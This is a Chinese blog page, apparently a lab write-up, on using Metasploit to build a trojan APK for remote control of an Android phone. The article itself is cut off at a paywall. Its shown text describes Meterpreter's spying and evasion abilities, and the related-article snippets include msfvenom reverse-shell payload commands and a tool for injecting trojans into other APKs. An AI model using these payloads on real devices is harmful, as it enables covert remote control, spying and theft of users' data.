木马渗透安卓系统实验

最新推荐文章于 2024-06-17 18:38:04 发布
最新推荐文章于 2024-06-17 18:38:04 发布
阅读量4.4k 收藏 107
点赞数 12
分类专栏: Metasploit 文章标签: Metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/polaris___/article/details/90700678
版权
本文介绍了如何使用Metasploit框架生成木马apk,通过反编译、注入payload、权限设置和回编译过程,然后在安卓手机上安装测试,实现远程控制。实验涉及Meterpreter的特性,包括隐藏、多会话管理和各种系统控制功能。
摘要由CSDN通过智能技术生成

1.实验内容

Metasploit后门攻击实现远程控制Android手机 

2.实验环境

设备

IP

子网掩码

Kali Linux(Hack)

222.20.78.6

255.255.248.0

Android(靶机)

10.11.63.254

255.255.240.0

Metasploit是在2004年8月,在拉斯维加斯如开了一次世界黑客交流会—黑帽简报(Black Hat Briefings)提出来的一款开源的安全漏洞检测工具,可以帮助用户识别安全问题,验证漏洞的缓解措施,并对某些软件进行安全性评估,提供真正的安全风险情报。Metasploit软件为它的基础功能提供了多个用户接口,包括终端、命令行和图形化界面等。生成木马文件。

MSF终端(MSFCONSOLE)是目前Metasploit框架最为流行的用户接口,而且也是非常灵活的。MSFCONSOLE主要用于管理Metasploit数据库,管理会话、配置并启动Metasploit模块。本质上来说,就是为了利用漏洞,MSFCONSOLE将获取用户连接到主机的信息,以至于用户能启动渗透攻击目标系统。

Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外Meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS[基于主机的入侵检测系统很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一

最低0.47元/天 解锁文章
西瓜丢了个芝麻
关注
  • 12
    点赞
  • 107
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
Android木马分析实验,Android木马简介与分析
weixin_42500130的博客
05-26 1348
本文介绍基于Android的手机恶意软件,是一个基础性的介绍,给新入门的人提供一个分析和工具指引。要分析的木马是一个2013年的syssecApp.apk,这个木马的分析能对Android恶意软件有个大概了解。基础:1 –Android应用基础Android是google开发基于Linux内核的开源的手机操作系统,应用程序使用JAVA语言编写并转换成了Dalvik虚拟机,而虚拟机 则提供了一个抽象...
Kali环境使用Metasploit生成木马入侵安卓手机
热门推荐
zhaghailiangji的博客
02-27 2万+
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。环境准备:Kali2.0(msfVENOM、metasploit)安卓手机安卓模拟器利用过程:先查看本地IP...
Msfvenom控制手机
2301_77315080的博客
09-27 286
3监听利用msfconsole监听模块。Msfvenom的使用(kali操作)后置摄像头拍照(1是后置,2是前置)设置主机(云服务器)设置主机(云服务器)
手机远控apk木马/安卓远程木马-零开始网安知识点
最新发布
2401_84915584的博客
06-17 443
毒文件,与一般的病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种主机的门户,
kali metasploit 之生成木马入侵android
weixin_30483013的博客
05-25 1575
1.打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件(生成apk木马程序)。 msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 > /root/apk.apk #生成apk木马,设置本机ip与自定义端口 然后启动msf: msfconsole 1.us...
病毒实验木马病毒实验
12-06
了解木马程序的结构、传播方法、安装与自启动机制,加深木马病毒原理的认识;掌握木马病毒的查杀一般方法。
渗透学习总结之利用木马渗透攻击安卓手机
ABABC1234的博客
07-09 414
利用exploit/multi/handler渗透攻击安卓手机实验过程
Android系统木马隐藏及检测技术
05-24
Android系统木马隐藏及检测技术是当前移动安全领域内一个非常关键的研究课题。随着Android操作系统的普及,越来越多的用户使用这一平台进行通信、娱乐、学习及工作,随之而来的是针对Android系统的恶意软件数量急剧...
杭电网安操作系统实验报告
07-06
此外,操作系统还会通过更新补丁、防火墙配置、入侵检测系统等手段来抵御病毒、木马和黑客攻击。 在实际操作环节,学生们可能进行了模拟攻击和防御的实战演练,学习如何识别和修复安全漏洞,以及如何配置防火墙规则...
画廊效果+旋转木马效果 banner广告位 android
09-29
"画廊效果+旋转木马效果 banner广告位 android"项目就是针对这一需求的一个解决方案。这个项目利用了ViewPager组件来实现动态、引人注目的广告展示方式,结合了画廊浏览和旋转木马效果,为用户提供了一种既美观又...
Linux系统木马后门查杀方法详解
01-09
木马和后门的查杀是系统管理员一项长期需要坚持的工作,切不可掉以轻心。以下从几个方面在说明Linux系统环境安排配置防范和木马后门查杀的方法:  一、Web Server(以Nginx为例)  1、为防止跨站感染,将虚拟...
trojandroid_mixapk:python脚本将两个apk合并为一个
05-22
在此处完整的自述文件 trojandroid_mixapk 这是一个使用出色的将木马注入另一个APK的python脚本。 该脚本将两个APK解包,将木马的smali代码复制并修改为get10包,当然需要对清单进行一些修改,此get10之后可以重新打包,安装和使用而没有任何问题。 脚本的帮助信息 #python mixapk.py -h usage: mixapk.py [-h] [--apks trojanApk apkToInfect] [--adb] ACTION optional arguments: -h, --help show this help message and exit --apks trojanApk apkToInfect specify the Trojan Apk and the APk to Infect --adb
Linux服务器安全分析与清除木马渗透
11-20
这些文件的出现通常意味着木马已经对系统进行了深度的渗透,处理起来更为复杂。 在本例中,最终提出了两种处理木马的方式,一种是重装操作系统,这是最彻底、最直接的方式。另一种是手动清除木马,需要操作者对...
android手机病毒原理,安卓手机病毒的原理是什么
weixin_33526515的博客
05-26 577
安卓手机病毒的原理是什么Android系统因其开源性而受到了众多手机厂商和用户的倾爱,因为开源,所以降低了手机厂商的使用成本,也能让更多的开发者加入Android应用 的开发行列。下面是jy135小编收集整理的安卓手机病毒的原理是什么,欢迎阅读。病毒”原理Android系统因其开源性而受到了众多手机厂商和用户的倾爱,因为开源,所以降低了手机厂商的使用成本,也能让更多的开发者加入Android应用 ...
利用msfvenom制作木马,并且反弹shell
m0_64444909的博客
09-14 5280
msf
新型 Android 银行木马“MoqHao”利用社交网络隐藏 C&C 服务器
qq_36606493的博客
10-09 928
作者:启明星辰ADLab 1、概述 启明星辰AdLab近期追踪到一个新出现的 Android 恶意木马样本,该恶意木马主要通过钓鱼 APP 来窃取用户银行及理财 APP 登录凭证,能够通过创建本地代理来窃取 Google 账户登录凭证,且具备远程控制感染机的能力。依据样本关联分析我们发现,该同类型的样本之前被 Mcafee 披露过(其在8月28日将该银行木马命名为:Android/Mo
[内网渗透]msfconsole提权
purvispanwu的博客
03-17 1308
1.环境准备 kali虚拟机 IP:192.168.112.66 靶机 win7 SP1 IP:192.168.112.145 2.生成后门程序 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.112.66 lport=4444 -f exe -o /tmp/purvis.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为192.168.112.66
Android木马之“妄想”
移动平台应用软件开发技术
04-21 2463
作者:苗甦        Android的使用已经越来越广泛,与传统的PC操作系统相比Android存在自己的特点。一方面Android运行在手机终端上,手机是人们会随身携带的,而且手机也作为通讯的主要方式,因此通过手机可以获得更多的个人隐私。另一方面Android不会运行在服务器上,Android设备也可以通过3G与Internet连接,传统的IDS对Android木马的影响会减小
使用msfconsole常见问题解决
Amdy_amdy的博客
08-23 1万+
问题总结: (其中有我遇到的问题,有我没有遇到的,但我这里总结了一下别人遇到的,未雨绸缪)问题一(这个我也遇到过,不过我安装了上面的win 32就没问题了):原因:这个因为没有/root/.wine目录,执行以下命令即可创建该目录 wine cmd.exe 问题二(我没有遇到):原因:wine在使用过程中会出现图形化界面,这就需要这个基于Mozilla的Gecko渲染引擎来呈现,手动安装所需版本的wine-gecko即可。我们首先下载Wine提供的MSI二进制文件,请注意下载32位版本的,因为我
kali生成木马程序渗透linux系统
05-24
Kali Linux 是一款专门用于网络安全测试和渗透测试的操作系统,它提供了许多工具来测试和攻击不同类型的系统和网络。其中,生成木马程序是一种常用的攻击方式。 首先,需要使用 Kali Linux 上的一个名为 Metasploit 的工具来生成木马程序。Metasploit 是一款开源的渗透测试框架,可以用于创建、测试和部署漏洞利用。 其次,需要了解目标系统的漏洞情况,选择合适的漏洞利用模块,并配置相关参数。利用 Metasploit 生成木马程序后,可以使用不同的方式进行部署和传播。 请注意,本人作为 CSDN 自主开发的 AI 助手,不提倡或支持任何非法行为和攻击行为。以上内容仅供学习和研究之用,请勿将其用于任何非法用途。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值